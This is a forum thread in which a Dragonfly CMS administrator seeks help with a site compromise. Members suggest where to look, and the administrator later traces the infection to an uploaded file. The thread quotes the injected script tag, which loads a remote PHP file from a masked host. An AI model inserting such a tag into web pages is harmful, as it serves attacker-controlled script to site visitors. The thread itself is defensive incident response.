Support ⇒ Security ⇒ Code Insertion Between Head and Body Tags ⇒ Community Forums ⇒ CPG Dragonfly™ CMS
Forum IndexSecurity

Code Insertion Between Head and Body Tags Reply to topic


On one of the websites that I administer, I have a code injection between the head and body tags. I have searched the source code, but I have yet to figure out where the culprit is hiding.
</head><script src=http://xxx.xxx/piudurres/indexu.php ></script> <body>

Any help would be greatly appreciated.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


/themes/*/template/index.php
if you can't find it clear the /cache/

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Themmes/yourtheme/template/header.html

cache folder. Check your cache folder permissions.

www.greenday2k.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):


I eventually found it, however, most of it was base64 encoded. It took over almost all javascript files and many php files including config.php.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


I am still working on trying to figure out how it got in. I have had the one site for about 2 years with no problems and all of a sudden I have two sites both attacked almost concurrently. There have been no changes on hosting or configuration. The first site was infected by an upload of /rss/page.php.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


jcjordan, most luckily the attach was done from within the server ... however which files they modified? Asking because I'm working on few solutions against those kind of attacks and an extensive list of modified files would really help.

Both sites attacked on the same time? Must be done from within the server, is it a shared server?

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


I have a list of most of the files that they modified and what I think is the original culprit. If you would like, I can send the list and file to you.

Yes, it is a shared server and I have the security team checking into it now.

It was not simultaneous, but it did happen very quickly. I ended up having to kill the site completely, verify that the files were clean and then re-up.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


pm sent

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Email sent. I sent you the logs, the list of files changed over different domains, and the catalyst file called /rss/page.php.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


Never received your email :), please send it again.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS

All times are UTC


Jump to: